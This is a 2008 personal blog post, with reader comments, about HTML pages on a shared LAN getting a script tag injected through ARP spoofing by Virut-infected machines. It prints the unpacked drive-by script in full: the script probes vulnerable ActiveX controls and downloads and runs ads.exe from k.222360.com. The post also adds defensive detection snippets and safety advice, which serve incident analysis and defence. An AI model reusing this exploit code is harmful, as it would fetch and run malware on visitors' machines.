Anjanesh

Assignment Statements, Comparisons & Observations

Injected JavaScript line: 222360.com & asdafdgfgf.com

Tuesday, January 29, 2008

I'm a guy who is pretty much cautious about computer security, though I'm not a network or security guru. The last time I formatted my hard-disk & installed my OS was sometime in December 2004, when my old PC was no good anymore and I had to get a new one in January 2005. It was an HP with Windows XP SP2 OEM pre-loaded. Based on my previous years of experience, I managed to stay away from all possible malicious worms entering my PC. I never log in as Administrator except for installation and global configuration settings. I am always logged in under User mode. I guess a Linux user is probably laughing at this, saying "that's the way it always was". In Linux, using a non-root user is standard for two reasons:
1. You can log in as root in a shell within a user environment to take care of admin issues. (The same is possible in Windows XP using right-click > Run as.)
2. Most installations can be done to any location - unlike C:\Program Files & C:\Windows, where many installers require files to be added.

But when you install Windows, it creates a user under the Administrators group, so Windows users get administrative rights by default. And thus Windows system files are open to intrusion when someone surfs the net using IE and allows the website to run an ActiveX object.

During the last week of December 2007, I started noticing that all my HTML webpages had a JavaScript line injected into them, right at the top of the page.
It was linking to a subdomain of 222360.com & later on to asdafdgfgf.com - both domains were created recently last year. An example of the injected line was like this:

<SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>
There are many variants of this line - different letters for the subdomain, and ads.js before it was un.js.
The code is packed using packer. The unpacked code shows that it tries to create 5 ActiveX objects. The last one attempts to download an ads.cab file if the BaiduToolBar plugin is installed, extract ads.exe out of the cab file and perhaps run it (if the third argument, 0, implies that). What ads.exe does is still unclear.
if (document.cookie.indexOf('OKSUN') == -1)
 {
        try
         {
                var e;
                var ado = (document.createElement("object"));
                ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
                var as = ado.createobject("Adodb.Stream", "")
         }
        catch(e){};
        finally
         {
                var expires = new Date();
                expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
                document.cookie = 'OKSUN=SUN;path=/;expires=' + expires.toGMTString();
                document.write("<\/script>");
 
                if(e != "[object Error]")
                 {
                        document.write("<\/script>")
                 }
                else
                 {
                        try
                         {
                                var f;
                                var storm = new ActiveXObject("MPS.StormPlayer")
                         }
                        catch(f){};
                        finally
                         {
                                if (f != "[object Error]")
                                {
                                       document.write("<\/script>");
                                       document.write("")
                                }
                         }
 
                        try
                         {
                                var g;
                                var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
                         }
                        catch(g){};
                        finally
                         {
                                if (g != "[object Error]")
                                 {
                                        document.write("<\/script>");
                                        document.write("")
                                 }
                         }
 
                        try
                         {
                                var h;
                                var thunder = new ActiveXObject("DPClient.Vod")
                         }
                        catch(h){};
                        finally
                         {
                                if (h != "[object Error]")
                                 {
                                        document.write("<\/script>");
                                        document.write("")
                                 }
                         }
 
                        try
                         {
                                var i;
                                var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
                         }
                        catch(i){};
                        finally
                         {
                                if (i != "[object Error]")
                                 {
                                        document.write("")
                                 }
                         }
 
                        try
                         {
                                var j;
                                var obj = new ActiveXObject("BaiduBar.Tool")
                         }
                        catch(j){};
                        finally
                         {
                                if (j != "[object Error]")
                                 {
                                        obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
                                        document.write("")
                                 }
                         }
 
                        if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
                         {
                                document.write("")
                         }
                 }
         }
 }

I was stunned at how this could have happened, thinking all my browsers were infected with a worm that modifies the HTML source. But none of the localhost pages had that JS line, and a simple piece of code to retrieve the contents of a URL, or using GnuWin32 wget, showed that the injected line still persisted. I ended up formatting my PC anyway and reinstalling everything, including a full Windows update. But the first thing I did before connecting to my LAN was adding entries to my hosts file mapping 222360.com, [a-z].222360.com, asdafdgfgf.com and [a-z].asdafdgfgf.com to 127.0.0.1.
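A check of the kind described above, as an added example that is not part of the original post: it parses the copy of a page as served (for instance fetched with wget) and the copy on disk, and reports any script referenced only by the served copy unless it is hosted on a domain you own. The allow-list host and the sample pages are constructed; the injected line is the one quoted in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag. HTMLParser lower-cases
    tag and attribute names, so <SCRIPT SRC=...> is picked up as well."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def script_sources(html):
    """Return the script src values of an HTML document, in document order."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def injected_scripts(local_html, served_html, own_hosts):
    """Scripts referenced by the served page but absent from the local copy,
    except those hosted on a domain in own_hosts (constructed allow-list)."""
    expected = set(script_sources(local_html))
    suspicious = []
    for src in script_sources(served_html):
        if src in expected:
            continue
        host = urlparse(src).hostname
        if host is None or host.lower() not in own_hosts:
            suspicious.append(src)
    return suspicious


# Constructed sample: the page as it sits on disk, and the same page as it
# arrived over the LAN with the line quoted in the post prepended to it.
LOCAL_COPY = (
    '<html><head><title>Home</title>'
    '<script src="http://www.example.test/js/site.js"></script></head>'
    '<body>Hello</body></html>'
)
SERVED_COPY = (
    '<SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>'
    + LOCAL_COPY
)
INJECTED = injected_scripts(LOCAL_COPY, SERVED_COPY, {"www.example.test"})
```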

Though the JS line kept coming in, I didn't regret the format + install task, as I got rid of a lot of unnecessary stuff.
The only other way this could possibly come in was from the ISP, or so I thought. But the ISP tech support wouldn't listen to such a story. It was only a couple of days later that I found out on the net that the same issue was experienced elsewhere, as mentioned in this Experts Exchange thread, and then later two guys from Mumbai posted the exact same problem to my devnetwork thread. Apparently our entire LAN was suffering downtimes and JS line injection. It was clear that it's coming from the network and not from the ISP, as the local cable operator's network has a number of ISPs plugged in. What's still unclear is how this attack took place at relatively the same time, and that too in Asia.

After visiting one of the forum guys' cable operator's office and checking this out with the help of a network expert, it was found that this is the result of an overwhelming number of ARP requests being sent, spoofing the gateway.
From Wikipedia:

The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. Generally, the aim is to associate the attacker's MAC address with the IP address of another node (such as the default gateway). Any traffic meant for that IP address would be mistakenly sent to the attacker instead. The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing) or modify the data before forwarding it (man-in-the-middle attack). The attacker could also launch a Denial of Service attack against a victim by associating a nonexistent MAC address to the IP address of the victim's default gateway.

A virus called W32.VirutA (risk level reported by Symantec as Very Low) was found on many customers' PCs, which seems to be doing exactly that, since after a cleanup of most of the PCs the attacks diminished.
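As an added example (not the post's code, nor the ARProtect tool mentioned in the comments) of the check a network expert would run on an XP box during an incident like this: it parses the text of Windows `arp -a`, compares the gateway's current MAC with the one recorded while the LAN was healthy, and flags any MAC claimed by more than one IP address, which is the usual sign that a station is answering for the gateway. The gateway address, its known MAC and the ARP snapshot are constructed.

```python
import re
from collections import defaultdict

# One data row of Windows "arp -a": IP address, dash-separated MAC, entry type.
_ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})\s+(\w+)",
    re.MULTILINE,
)

def parse_arp_table(text):
    """Return {ip: mac} from 'arp -a' output, MACs normalised to lower case."""
    return {ip: mac.lower() for ip, mac, _ in _ARP_ROW.findall(text)}

def arp_findings(table, gateway_ip, known_gateway_mac):
    """Describe anything in the ARP cache that points at gateway spoofing."""
    findings = []
    expected = known_gateway_mac.lower()
    current = table.get(gateway_ip)
    if current is None:
        findings.append(f"gateway {gateway_ip} is not in the ARP cache")
    elif current != expected:
        findings.append(
            f"gateway {gateway_ip} now resolves to {current}, expected {expected}"
        )
    # A spoofing station's own entry and the poisoned gateway entry share a MAC.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(
                f"MAC {mac} claimed by {len(ips)} addresses: {', '.join(sorted(ips))}"
            )
    return findings

# Constructed snapshot: the gateway's entry has been overwritten with the MAC
# of another station on the same segment.
GATEWAY_IP = "192.168.1.1"
KNOWN_GATEWAY_MAC = "00-11-22-33-44-55"
SAMPLE_ARP = """Interface: 192.168.1.5 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-aa-bb-cc-dd-ee     dynamic
  192.168.1.7           00-AA-BB-CC-DD-EE     dynamic
  192.168.1.9           00-11-22-33-44-99     dynamic
"""

if __name__ == "__main__":
    for line in arp_findings(parse_arp_table(SAMPLE_ARP), GATEWAY_IP, KNOWN_GATEWAY_MAC):
        print(line)
```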

Keep your PC safe:

  1. Use C: for Windows and installed programs and keep separate drives for your data - preferably on a separate hard-disk. In case of a sudden reformat or reinstallation of Windows, you don't need to spend the rest of your day searching for your data files and backing them up.
  2. Log in as a user without administrative rights, preferably under the Users group. For installation, log in as Administrator, install, and come back to your user login. Most software these days allows you to specify a data directory other than its default one. Find that and change it to the other drive. In the worst case, just give the user full permissions to the particular file/folder (in C:\Program Files) that requires writing to. Under no circumstances should you give write permission to anything in C:\Windows.
  3. Use Mozilla Firefox as the default web browser. It doesn't support ActiveX objects.
  4. Install an anti-virus and update it regularly.
  5. Use a firewall - these days, viruses attack the network, not your hard-disk. Windows XP SP2 comes with its own firewall.
  6. Don't use cracked software programs for your needs - there are many free versions that are equally good, or express editions aimed at the beginner & intermediate level, available for download for free. I already blogged about this before.
  7. Use the Adblock Plus extension for Firefox - you can block as many external references as you want. For example, I added *.222360.com to block anything coming from that domain. This is also the best way to block Google Ads.

5 comments:

to the limit and beyond... said...

We have developed a Windows application that can pinpoint the PC doing ARP spoofing in the network. We are releasing that as freeware.

You can download ARProtect from www.netoptima.in/arprotect

http://www.netoptima.in/arprotect should solve your problem


Abhiram said...

I've got the exact same problem and my ISP has absolutely no idea about it. Downloading the tool from netoptima right now and I hope it works. Thanks.


Anjanesh said...

I did try using netoptima's tool - but it kept giving a different IP each time I ran it.
So either a whole lot of PCs are infected, or somehow the infected PC's IP keeps changing.


Abhiram said...

The tool didn't work for me. I did a complete scan and got rid of about 13 different instances of viruses. I thought that did the job, but looks like it didn't. And the tool isn't working for me, maybe the IPs of the other systems on the network are not visible to me.

Any idea on where exactly this virus exists? Or what name it runs under?


Anjanesh said...

The virus seems to be Virut.
A Google search on Virut will give you loads of information on what it does.

But it can be any other virus as well that performs ARP spoofing.